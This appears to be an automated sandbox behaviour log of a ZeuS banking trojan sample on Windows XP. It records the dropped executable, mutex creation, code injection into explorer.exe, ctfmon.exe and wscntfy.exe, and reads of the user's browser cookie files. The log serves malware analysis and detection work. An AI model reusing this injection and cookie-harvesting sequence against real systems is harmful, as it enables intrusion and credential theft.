Memory allocated PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: 183000 Length: 12F448 Allocation Type: null Protection: page read and write success or wait 1981643080
Memory allocated PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: 184000 Length: 12F628 Allocation Type: null Protection: page read and write success or wait 1981653669
File opened Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false success or wait 1981666386
Memory allocated PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: BD0000 Length: 12FAEC Allocation Type: null Protection: page read and write success or wait 1981666728
File read Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Offset: none Length: 171520 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 F8 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65 success or wait 1981666828
Mutant created Name: \BaseNamedObjects\Local\{70C7FA5B-C2C6-5FB1-185B-81F8EE8A3A3D} success or wait 1981809435
Key value queried Path: HKEY_USERS\S-1-5-21-507921405-1960408961-839522115-500\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders Name: Okmaykid object name not found 1981809652
System info queried Type: ProcessInformation success or wait 1981809948
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: BD0000 Size: 16384 Protection: read write Mapped to pid: own pid success or wait 1981812632
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-C250-CCC334817706} success or wait 1981813497
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-AE51-CCC358807706} success or wait 1981813863
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A252-CCC354837706} success or wait 1981814198
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BA52-CCC34C837706} success or wait 1981814529
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-6E52-CCC398837706} success or wait 1981814854
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-7252-CCC384837706} success or wait 1981815181
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BA53-CCC34C827706} success or wait 1981815521
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0E53-CCC3F8827706} success or wait 1981815863
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-DA54-CCC32C857706} success or wait 1981816202
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-8A54-CCC37C857706} success or wait 1981816542
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BE54-CCC348857706} success or wait 1981816877
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1E55-CCC3E8847706} success or wait 1981817217
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A256-CCC354877706} success or wait 1981817561
Memory allocated PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1F70000 Length: 12F850 Allocation Type: null Protection: page execute and read and write success or wait 1981817755
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1F70000 Length: 27000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1981818577
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1F70000 Length: 27000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1981818697
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1F70000 Length: 159744 Value: 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 00 31 60 2D 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 08 02 00 00 3A 00 00 00 00 00 success or wait 1986693326
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1F92D50 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1986693727
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1F92000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1986693849
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1F92D50 Length: 4 Value: 00 00 00 00 success or wait 1986707393
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1F92D64 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1986707685
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1F92000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1986708117
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1F92D64 Length: 4 Value: 00 00 F7 01 success or wait 1986759335
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1F93214 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1986760172
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1F93000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1986760470
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1F93214 Length: 4 Value: C0 02 00 00 success or wait 1986772738
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1F93218 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1986773069
Memory attributes changed PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1F93000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1986773367
Memory written PID: 1636 Path: C:\WINDOWS\explorer.exe Base: 1F93218 Length: 4 Value: 90 02 00 00 success or wait 1986816109
Thread created PID: 1636 TID: 4008 EIP: 7C8106F9 Imagepath: C:\WINDOWS\explorer.exe Injected: true success or wait 1986856572
Thread resumed TID: 4008 PID: 1636 Path: C:\WINDOWS\explorer.exe success or wait 1986857468
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-E257-CCC314867706} success or wait 1997271367
Memory allocated PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: A30000 Length: 12F850 Allocation Type: null Protection: page execute and read and write success or wait 1997271938
Memory allocated PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: B53000 Length: 12F5FC Allocation Type: null Protection: page read and write success or wait 1997272284
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: A30000 Length: 27000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1997273931
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: A30000 Length: 27000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1997274249
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: A30000 Length: 159744 Value: 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 00 31 60 2D 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 08 02 00 00 3A 00 00 00 00 00 success or wait 1998976573
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: A52D50 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1998979257
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: A52000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1998979556
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: A52D50 Length: 4 Value: 00 00 00 00 success or wait 1999039382
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: A52D64 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999039692
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: A52000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999039995
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: A52D64 Length: 4 Value: 00 00 A3 00 success or wait 1999095052
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: A53214 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999095960
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: A53000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999096721
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: A53214 Length: 4 Value: 70 01 00 00 success or wait 1999156272
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: A53218 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999156749
Memory attributes changed PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: A53000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 1999157195
Memory written PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe Base: A53218 Length: 4 Value: 74 01 00 00 success or wait 1999215777
Thread created PID: 1828 TID: 1656 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\ctfmon.exe Injected: true success or wait 1999276533
Thread resumed TID: 1656 PID: 1828 Path: C:\WINDOWS\system32\ctfmon.exe success or wait 1999277445
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0651-CCC3F0807706} success or wait 2000031154
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-3A51-CCC3CC807706} success or wait 2000032170
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0257-CCC3F4867706} success or wait 2000033164
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-2A50-CCC3DC817706} success or wait 2000034129
Memory allocated PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: AE0000 Length: 12F850 Allocation Type: null Protection: page execute and read and write success or wait 2000034634
Memory allocated PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: B53000 Length: 12F5FC Allocation Type: null Protection: page read and write success or wait 2000034977
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: AE0000 Length: 27000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2000036549
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: AE0000 Length: 27000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2000036916
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: AE0000 Length: 159744 Value: 4D 5A 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4C 01 03 00 31 60 2D 4E 00 00 00 00 00 00 00 00 E0 00 02 01 0B 01 0A 00 00 08 02 00 00 3A 00 00 00 00 00 success or wait 2001424232
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: B02D50 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001430921
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: B02000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001431466
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: B02D50 Length: 4 Value: 00 00 00 00 success or wait 2001494517
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: B02D64 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001495237
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: B02000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001495919
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: B02D64 Length: 4 Value: 00 00 AE 00 success or wait 2001557133
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: B03214 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001557550
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: B03000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001557892
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: B03214 Length: 4 Value: 9C 00 00 00 success or wait 2001580889
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: B03218 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001588255
Memory attributes changed PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: B03000 Length: 1000 New Protection: page execute and read and write New Protection: page execute and read and write success or wait 2001588597
Memory written PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe Base: B03218 Length: 4 Value: A0 00 00 00 success or wait 2001601163
Thread created PID: 236 TID: 2512 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\wscntfy.exe Injected: true success or wait 2001647960
Thread resumed TID: 2512 PID: 236 Path: C:\WINDOWS\system32\wscntfy.exe success or wait 2001648912
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1252-CCC3E4837706} success or wait 2002409322
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A654-CCC350857706} success or wait 2002410340
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1657-CCC3E0867706} success or wait 2002411331
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-7658-CCC380897706} success or wait 2002412358
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1E58-CCC3E8897706} success or wait 2002413337
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-6E57-CCC398867706} success or wait 2002415165
Memory allocated PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Base: BF0000 Length: 12F850 Allocation Type: null Protection: page execute and read and write success or wait 2002415689
Memory allocated PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe Base: B53000 Length: 12F5FC Allocation Type: null Protection: page read and write success or wait 2002416038
Thread created PID: 1960 TID: 2544 EIP: 7C8106F9 Imagepath: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe Injected: true success or wait 2002709183
Thread resumed TID: 2544 PID: 1960 Path: C:\ZeuS_binary_fb65104ccd2ca664496234d3f2c2a371.exe success or wait 2002710018
System info queried Type: ProcessInformation success or wait 2002941842
Section loaded Path: none Access: query and write and read Type: commit Baseaddress: BD0000 Size: 16384 Protection: read write Mapped to pid: own pid success or wait 2002949192
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-C250-CCC334817706} success or wait 2002951532
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-AE51-CCC358807706} success or wait 2002952582
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A252-CCC354837706} success or wait 2002953541
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BA52-CCC34C837706} success or wait 2002954485
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-6E52-CCC398837706} success or wait 2002955415
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-7252-CCC384837706} success or wait 2002956351
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BA53-CCC34C827706} success or wait 2002957324
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0E53-CCC3F8827706} success or wait 2002958410
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-DA54-CCC32C857706} success or wait 2002959377
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-8A54-CCC37C857706} success or wait 2002960397
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-BE54-CCC348857706} success or wait 2002961367
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1E55-CCC3E8847706} success or wait 2002962335
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0651-CCC3F0807706} success or wait 2002964211
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-3A51-CCC3CC807706} success or wait 2002965174
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-0257-CCC3F4867706} success or wait 2002966154
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1252-CCC3E4837706} success or wait 2002967546
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-A654-CCC350857706} success or wait 2002968520
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1657-CCC3E0867706} success or wait 2002969499
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-7658-CCC380897706} success or wait 2002970515
Mutant created Name: \BaseNamedObjects\Global\{5FEF9DAD-A530-7099-1E58-CCC3E8897706} success or wait 2002971489
Process terminated PID: 224 Path: C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe success or wait 2002974175
Analysis File: explorer.exe PID: 1636 Parent PID: 224
+ Sections
+ General
Start time: 06:06:39
Start date: 01/12/2011
Path: C:\WINDOWS\explorer.exe
Commandline: C:\WINDOWS\Explorer.EXE
Imagebase: 0x1000000
File size: 1033728 bytes
MD5 hash: 12896823FB95BFB3DC9B46BCAEDC9923
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\Documents and Settings\Administrator\Cookies\administrator@ad.wsod[2].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@adobe[1].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@adobe[2].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[1].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[2].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[3].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@bing[1].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@bing[2].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@c.bing[1].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[1].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[2].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[3].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@ch.msn[1].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@doubleclick[1].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@ivwbox[2].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@live[1].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@live[2].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[1].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[2].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[3].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@msn[1].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@msn[2].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@msn[3].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@rad.msn[2].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[1].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[2].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[4].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@wemfbox[2].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[1].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Cookies\administrator@www.bing[2].txt write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.tmp write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Application Data\Foluv\hianh.exe write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8AFC7
C:\Documents and Settings\Administrator\Application Data\Foluv write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8B374
C:\Documents and Settings\Administrator\Application Data\Qiokze write attributes and synchronize synchronous io non alert and open for backup ident and open reparse point success or wait 2 1F8B374
C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.dat read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 1 1F846EA
C:\Documents and Settings\Administrator\Application Data\Qiokze\pauz.sei read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F7FAC3
C:\Documents and Settings\Administrator\Cookies\administrator@ad.wsod[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@adobe[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@adobe[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@atdmt[3].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@bing[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@bing[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@c.bing[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@c.msn[3].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@ch.msn[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@doubleclick[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@ivwbox[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@live[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@live[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@microsoft[3].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@msn[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@msn[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@msn[3].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@rad.msn[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[1].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[2].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
C:\Documents and Settings\Administrator\Cookies\administrator@scorecardresearch[4].txt read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 1 1F8AE9D
